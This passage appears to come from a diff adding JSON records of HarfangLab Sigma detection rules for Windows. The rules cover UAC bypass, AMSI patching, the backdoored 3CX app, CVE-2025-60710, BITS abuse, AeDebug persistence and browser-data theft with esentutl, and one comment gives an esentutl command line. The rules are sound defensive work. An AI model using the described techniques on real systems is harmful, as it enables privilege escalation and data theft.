analyze the parent process and to downloaded file to look for malicious content or actions.\n", + "rule_creation_date": "2021-05-26", + "rule_modified_date": "2025-02-04", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1105" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": 
"0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.072727Z", + "creation_date": "2026-03-23T11:45:34.072730Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.072734Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/BeichenDream/GodPotato", + "https://attack.mitre.org/techniques/T1021/003/" + ], + "name": "t1021_003_suspicious_process_via_dcom.yml", + "content": "title: Suspicious Process Launched via DCOM\nid: 23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5\ndescription: |\n Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\n The GodPotato hacktool is known to use this method.\n It is recommended to investigate the launched process to determine its legitimacy.\nreferences:\n - https://github.com/BeichenDream/GodPotato\n - https://attack.mitre.org/techniques/T1021/003/\ndate: 2023/10/27\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1021.003\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentImage: '?:\\Windows\\System32\\svchost.exe'\n ParentCommandLine|contains: 'seclogon'\n UserSID: 'S-1-5-20'\n\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + 
"rule_level_override": null, + "rule_id": "23c6fc5b-6b2b-4ae3-8b4c-fbac861ae8b5", + "rule_name": "Suspicious Process Launched via DCOM", + "rule_description": "Detects a suspicious process launch with token impersonation via DCOM that can be the result of privilege escalation.\nThe GodPotato hacktool is known to use this method.\nIt is recommended to investigate the launched process to determine its legitimacy.\n", + "rule_creation_date": "2023-10-27", + "rule_modified_date": "2025-04-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.lateral_movement" + ], + "rule_technique_tags": [ + "attack.t1021.003" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.093309Z", + "creation_date": "2026-03-23T11:45:34.093311Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.093316Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html", + 
"https://attack.mitre.org/techniques/T1548/002/" + ], + "name": "t1548_002_uac_bypass_consent.yml", + "content": "title: UAC Bypass Executed via consent\nid: 23ec89c2-af05-41a4-aa3a-a08516d8e33c\ndescription: |\n Detects an unsigned DLL being loaded by consent.exe.\n This may be indicative of a technique used for circumventing User Account Control (UAC) to escalate privileges.\n Windows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\nreferences:\n - https://swapcontext.blogspot.com/2020/11/uac-bypasses-from-comautoapprovallist.html\n - https://attack.mitre.org/techniques/T1548/002/\ndate: 2020/09/10\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1574.002\n - attack.t1548.002\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.UACBypass\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n Image: '?:\\Windows\\System32\\consent.exe'\n ImageLoaded|endswith: '\\Windows\\System32\\consent.exe.local\\\\*\\comctl32.dll'\n\n filter_signed:\n Signed: 'true'\n Signature:\n - 'Microsoft Windows'\n - 'Microsoft Windows Publisher'\n - 'Microsoft Corporation'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "23ec89c2-af05-41a4-aa3a-a08516d8e33c", + "rule_name": "UAC Bypass Executed via consent", + "rule_description": "Detects an unsigned DLL being loaded by consent.exe.\nThis may be indicative of a technique used for circumventing User Account Control (UAC) to escalate 
privileges.\nWindows User Account Control allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to investigate the behavior of consent.exe and to identify the process responsible for the DLL file creation.\n", + "rule_creation_date": "2020-09-10", + "rule_modified_date": "2025-02-13", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1548.002", + "attack.t1574.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "240337a9-d676-4c03-b22e-8f7efcef8f2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.086779Z", + "creation_date": "2026-03-23T11:45:34.086781Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.086786Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/h0ru/AMSI-Reaper", + 
"https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal", + "https://attack.mitre.org/techniques/T1562/001/" + ], + "name": "t1562_001_amsi_reaper_powershell.yml", + "content": "title: PowerShell AMSI Reaper Executed\nid: 240337a9-d676-4c03-b22e-8f7efcef8f2d\ndescription: |\n Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\n This tool prevents the Windows AMSI to scan a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\n It is recommended to analyze the process executing this PowerShell script as well as to look for other type of malicious behavior on the target host.\nreferences:\n - https://github.com/h0ru/AMSI-Reaper\n - https://learn.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/02/07\nmodified: 2025/02/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.HackTool.AMSIReaper\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_name:\n PowershellCommand|contains: 'AMSIReaper'\n\n selection_amsi:\n PowershellCommand|contains|all:\n - 'AmsiOpenSession'\n - 'amsi.dll'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "240337a9-d676-4c03-b22e-8f7efcef8f2d", + "rule_name": "PowerShell AMSI Reaper Executed", + "rule_description": "Detects the execution of the AMSI (Antimalware Scan Interface) Reaper PowerShell tool.\nThis tool prevents the Windows AMSI to scan a specified process by patching the entry point of AmsiOpenSession in amsi.dll.\nIt is recommended to analyze the process 
executing this PowerShell script as well as to look for other type of malicious behavior on the target host.\n", + "rule_creation_date": "2024-02-07", + "rule_modified_date": "2025-02-05", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.defense_evasion" + ], + "rule_technique_tags": [ + "attack.t1562.001" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "24117cea-8f26-491f-a109-aa3ea8e9fc04", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604215Z", + "creation_date": "2026-03-23T11:45:34.604218Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604225Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats", + "https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html", + "https://attack.mitre.org/techniques/T1102/" + ], + "name": "t1102_3cx_github_dns.yml", + "content": "title: Backdoored 3CXDesktopApp Github Communication Detected\nid: 
24117cea-8f26-491f-a109-aa3ea8e9fc04\ndescription: |\n Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\n In late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer to in a wide supply chain attack.\n The backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\n It is recommended to terminate the 3CX software, to update it to a safe version and to look for signs of malicious actions stemming from the 3CX process.\nreferences:\n - https://www.huntress.com/blog/3cx-voip-software-compromise-supply-chain-threats\n - https://www.trendmicro.com/de_de/research/23/c/information-on-attacks-involving-3cx-desktop-app.html\n - https://attack.mitre.org/techniques/T1102/\ndate: 2023/03/31\nmodified: 2025/04/08\nauthor: HarfangLab\ntags:\n - attack.initial_access\n - attack.t1195.002\n - attack.command_and_control\n - attack.t1102\n - attack.t1071.001\n - classification.Windows.Source.DnsQuery\n - classification.Windows.Trojan.3CX\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n product: windows\n category: dns_query\ndetection:\n selection:\n QueryName:\n - 'github.com'\n - 'raw.githubusercontent.com'\n ProcessOriginalFileName: '3CXDesktopApp.exe'\n\n condition: selection\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "24117cea-8f26-491f-a109-aa3ea8e9fc04", + "rule_name": "Backdoored 3CXDesktopApp Github Communication Detected", + "rule_description": "Detects DNS requests to github.com and raw.githubusercontent.com made by the 3CXDesktopApp software.\nIn late March 2023, the 3CXDesktopApp software was backdoored and turned into a stealer to in a wide supply chain attack.\nThe backdoored 3CXDesktopApp gathers C2 URLs through a GitHub repository.\nIt is recommended to terminate the 3CX software, to update it to a safe 
version and to look for signs of malicious actions stemming from the 3CX process.\n", + "rule_creation_date": "2023-03-31", + "rule_modified_date": "2025-04-08", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.initial_access" + ], + "rule_technique_tags": [ + "attack.t1071.001", + "attack.t1102", + "attack.t1195.002" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "244d41bc-5373-4c23-8781-b57d4dd31e2d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "critical", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.604446Z", + "creation_date": "2026-03-23T11:45:34.604449Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.604457Z", + "rule_level": "critical", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://github.com/Wh04m1001/CVE-2025-60710", + "https://nvd.nist.gov/vuln/detail/CVE-2025-60710", + "https://attack.mitre.org/techniques/T1187/" + ], + "name": "cve_2025_60710_windows_recall.yml", + "content": "title: CVE-2025-60710 Windows Recall Privilege Escalation\nid: 244d41bc-5373-4c23-8781-b57d4dd31e2d\ndescription: |\n Detects file manipulation 
associated with CVE-2025-60710.\n CVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\n A low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\n The task’s multiple triggers let an attacker reliably invoke the deletion.\n It is recommended to check the related process for suspicious activities.\nreferences:\n - https://github.com/Wh04m1001/CVE-2025-60710\n - https://nvd.nist.gov/vuln/detail/CVE-2025-60710\n - https://attack.mitre.org/techniques/T1187/\ndate: 2025/11/14\nmodified: 2025/11/17\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1068\n - cve.2025-60710\n - classification.Windows.Source.Filesystem\n - classification.Windows.Exploit.Recall\n - classification.Windows.Exploit.CVE-2025-60710\n - classification.Windows.Behavior.PrivilegeEscalation\nlogsource:\n product: windows\n category: filesystem_rename\ndetection:\n selection:\n Path: '?:\\Users\\\\*\\AppData\\Local\\CoreAIPlatform.00\\UKP\\{????????-????-????-????-????????????}'\n TargetPath|startswith: '?:\\Windows'\n\n filter_system:\n ProcessUserSID: 'S-1-5-18'\n\n condition: selection and not filter_system\nlevel: critical\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "244d41bc-5373-4c23-8781-b57d4dd31e2d", + "rule_name": "CVE-2025-60710 Windows Recall Privilege Escalation", + "rule_description": "Detects file manipulation associated with CVE-2025-60710.\nCVE-2025-60710 is a local privilege escalation issue where a Windows scheduled task (WindowsAI\\Recall\\PolicyConfiguration) deletes GUID-pattern folders in %LOCALAPPDATA% without validating symlinks.\nA low privilege user can plant a malicious symlinked directory to force SYSTEM level arbitrary folder deletion.\nThe task’s multiple triggers let 
an attacker reliably invoke the deletion.\nIt is recommended to check the related process for suspicious activities.\n", + "rule_creation_date": "2025-11-14", + "rule_modified_date": "2025-11-17", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.privilege_escalation" + ], + "rule_technique_tags": [ + "attack.t1068" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "24693ed1-f629-47e5-bb5e-0ce442188fe9", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.071195Z", + "creation_date": "2026-03-23T11:45:34.071197Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.071201Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager", + "https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html", + "https://attack.mitre.org/techniques/T1197/", + "https://attack.mitre.org/techniques/T1105/", + "https://attack.mitre.org/software/S0190/" + ], + "name": "t1197_suspicious_binary_launched_by_bits.yml", + "content": "title: Suspicious 
Binary Launched via BITS\nid: 24693ed1-f629-47e5-bb5e-0ce442188fe9\ndescription: |\n Detects execution of suspicious binary launched by BITS.\n This is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\n This method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\n It is recommended to investigate the created process for suspicious activities.\nreferences:\n - https://docs.microsoft.com/en-us/windows/win32/api/bits/nn-bits-ibackgroundcopymanager\n - https://blog.menasec.net/2021/05/hunting-for-suspicious-usage-of.html\n - https://attack.mitre.org/techniques/T1197/\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/software/S0190/\ndate: 2021/07/30\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.t1197\n - attack.command_and_control\n - attack.t1105\n - attack.s0190\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.DefenseEvasion\n - classification.Windows.Behavior.Persistence\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n # C:\\Windows\\System32\\svchost.exe -k netsvcs -p -s BITS\n ParentImage|endswith: '\\svchost.exe'\n ParentCommandLine|contains: ' BITS'\n\n exclusion_bits:\n CommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n ParentCommandLine: '?:\\windows\\System32\\svchost.exe -k netsvcs -p -s BITS'\n\n exclusion_programfiles:\n Image|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n\n exclusion_directxdatabaseupdater.exe:\n # C:\\Windows\\System32\\directxdatabaseupdater.exe\n Image|endswith: '\\directxdatabaseupdater.exe'\n OriginalFileName: 'DirectXDatabaseUpdater.exe'\n\n exclusion_werfault:\n Image|endswith: '\\WerFault.exe'\n CommandLine|contains: '\\WerFault.exe -u -p '\n 
OriginalFileName: 'WerFault.exe'\n Signed: 'true'\n\n exclusion_mcafee:\n # McAfee WebAdvisor(bootstrap installer) (SaBsi module)\n ProcessSignature:\n - 'McAfee, Inc.'\n - 'McAfee, LLC'\n - 'MUSARUBRA US LLC' # new signer name for mcafee/trellix it seems\n\n exclusion_yandex:\n Image|endswith: '\\Yandex\\YandexBrowser\\Application\\browser.exe'\n Signed: 'true'\n ProcessSignature: 'YANDEX LLC'\n\n exclusion_opera_setup:\n Image|endswith: '\\OperaSetup.exe'\n Signed: 'true'\n Signature: 'Opera Norway AS'\n\n condition: selection and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "24693ed1-f629-47e5-bb5e-0ce442188fe9", + "rule_name": "Suspicious Binary Launched via BITS", + "rule_description": "Detects execution of suspicious binary launched by BITS.\nThis is typically the case of programs set to execute via the SetNotifyCmdline method from IBackgroundCopyManager interface.\nThis method is often used by attackers to download malicious files, exfiltrate data or maintain persistence.\nIt is recommended to investigate the created process for suspicious activities.\n", + "rule_creation_date": "2021-07-30", + "rule_modified_date": "2025-04-15", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.command_and_control", + "attack.defense_evasion", + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1105", + "attack.t1197" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "248a91c7-af38-4792-8ffb-942e6e7ce41b", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "high", + "rule_effective_confidence": "strong", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": 
false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.611456Z", + "creation_date": "2026-03-23T11:45:34.611459Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.611466Z", + "rule_level": "high", + "rule_confidence": "strong", + "rule_confidence_override": null, + "references": [ + "https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/", + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html", + "https://attack.mitre.org/techniques/T1005/" + ], + "name": "t1005_suspicious_browser_data_theft.yml", + "content": "title: Possible Browser Data Theft via Esentutl\nid: 248a91c7-af38-4792-8ffb-942e6e7ce41b\ndescription: |\n Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\n The Qakbot malware is known to use this technique to steal sensitive information.\n It is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\nreferences:\n - https://www.microsoft.com/security/blog/2021/12/09/a-closer-look-at-qakbots-latest-building-blocks-and-how-to-knock-them-down/\n - https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/\n - https://www.trendmicro.com/fr_fr/research/21/g/tracking_cobalt_strike_a_vision_one_investigation.html\n - 
https://attack.mitre.org/techniques/T1005/\ndate: 2022/04/22\nmodified: 2025/04/11\nauthor: HarfangLab\ntags:\n - attack.collection\n - attack.t1005\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.LOLBin.Esentutl\n - classification.Windows.Behavior.SensitiveInformation\n - classification.Windows.Behavior.CredentialAccess\n - classification.Windows.Behavior.Collection\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n Image|endswith: '\\esentutl.exe'\n # esentutl.exe /r V01 /lC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /sC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache /dC:\\Users\\xxx\\AppData\\Local\\Microsoft\\Windows\\WebCache\n CommandLine|contains|all:\n - 'esentutl.exe'\n - ' /r V01 '\n - ' /l'\n - ' /s'\n - ' /d'\n - '\\AppData\\Local\\Microsoft\\Windows\\WebCache'\n condition: selection\nlevel: high\nconfidence: strong\n", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "248a91c7-af38-4792-8ffb-942e6e7ce41b", + "rule_name": "Possible Browser Data Theft via Esentutl", + "rule_description": "Detects the suspicious execution of the legitimate esentutl.exe Windows binary to collect browser data from Internet Explorer and Microsoft Edge via the web cache.\nThe Qakbot malware is known to use this technique to steal sensitive information.\nIt is recommended to analyze the process responsible for the execution of Esentutl to determine whether its usage is legitimate.\n", + "rule_creation_date": "2022-04-22", + "rule_modified_date": "2025-04-11", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.collection" + ], + "rule_technique_tags": [ + "attack.t1005" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "24914a2f-f501-410c-8f63-d70ae6a01f4d", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + 
"test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "moderate", + "alert_count": 0, + "source_id": "0950c540-b155-4054-9b93-8fb2888de6ed", + "rule_level_overridden": false, + "whitelist_count": 0, + "last_modifier": { + "id": 1, + "username": "system_supervisor" + }, + "endpoint_detection": true, + "backend_detection": false, + "origin_stack": { + "id": "b8e2fe4fc90e4d08", + "name": null, + "is_current": false, + "is_supervisor": true, + "is_tenant": false + }, + "tenant": "b8e2fe4fc90e4d08", + "rule_is_depended_on": [], + "rule_type": "sigma_rule", + "origin_stack_id": "b8e2fe4fc90e4d08", + "last_update": "2026-03-23T11:45:34.617329Z", + "creation_date": "2026-03-23T11:45:34.617331Z", + "enabled": true, + "hl_status": "stable", + "hl_testing_start_time": "2026-03-23T11:45:34.617335Z", + "rule_level": "medium", + "rule_confidence": "moderate", + "rule_confidence_override": null, + "references": [ + "https://persistence-info.github.io/Data/aedebug.html", + "https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging", + "https://attack.mitre.org/techniques/T1546/" + ], + "name": "t1546_persistence_aedebug.yml", + "content": "title: Possible AeDebug Persistence Added\nid: 24914a2f-f501-410c-8f63-d70ae6a01f4d\ndescription: |\n Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\n Attackers can set this registry value to point to a malicious payload to achieve persistence.\n It is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\nreferences:\n - https://persistence-info.github.io/Data/aedebug.html\n - https://docs.microsoft.com/en-us/windows/win32/debug/configuring-automatic-debugging\n - https://attack.mitre.org/techniques/T1546/\ndate: 2022/07/20\nmodified: 2025/02/13\nauthor: HarfangLab\ntags:\n - 
attack.persistence\n - attack.t1546\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.Persistence\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\AeDebug\\Debugger'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n - '\"\"'\n\n exclusion_debuggers:\n Details|contains:\n - 'windbg.exe'\n - 'vsjitdebugger.exe'\n\n exclusion_piksels_digital_signage_debug:\n ProcessImage: '?:\\Program Files\\Digital signage ??\\kspAdminService.exe'\n Details|contains: '?:\\Program Files\\Digital signage 11\\ntsd.exe'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: moderate", + "block_on_agent": false, + "quarantine_on_agent": false, + "rule_level_override": null, + "rule_id": "24914a2f-f501-410c-8f63-d70ae6a01f4d", + "rule_name": "Possible AeDebug Persistence Added", + "rule_description": "Detects the creation or modification of the AeDebug registry key to enable debugger execution on application crashes.\nAttackers can set this registry value to point to a malicious payload to achieve persistence.\nIt is recommended to investigate whether the debugger specified under the AeDebug registry key is legitimate and authorized.\n", + "rule_creation_date": "2022-07-20", + "rule_modified_date": "2025-02-13", + "rule_os": "windows", + "rule_status": null, + "rule_tactic_tags": [ + "attack.persistence" + ], + "rule_technique_tags": [ + "attack.t1546" + ], + "warnings": null, + "errors": null, + "declared_in": null, + "source": "0950c540-b155-4054-9b93-8fb2888de6ed" +} +{ + "id": "249d762f-c5a2-406d-acf3-071a10d93210", + "test_maturity_current_count": 0, + "test_maturity_delay": 7, + "test_maturity_threshold": 10, + "global_state": "alert", + "effective_state": "alert", + "rule_effective_level": "medium", + "rule_effective_confidence": "weak", + "alert_count": 0, + "source_id": 
